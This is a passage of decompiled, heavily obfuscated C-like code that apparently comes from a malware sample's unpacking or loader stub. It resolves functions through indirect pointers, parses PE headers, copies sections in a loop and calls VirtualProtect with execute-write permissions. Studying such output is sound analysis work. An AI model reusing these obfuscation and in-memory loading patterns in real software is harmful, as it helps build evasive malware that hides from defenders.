				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(_t1002);
				 *_t1121 =  *_t1121 - _t1002;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
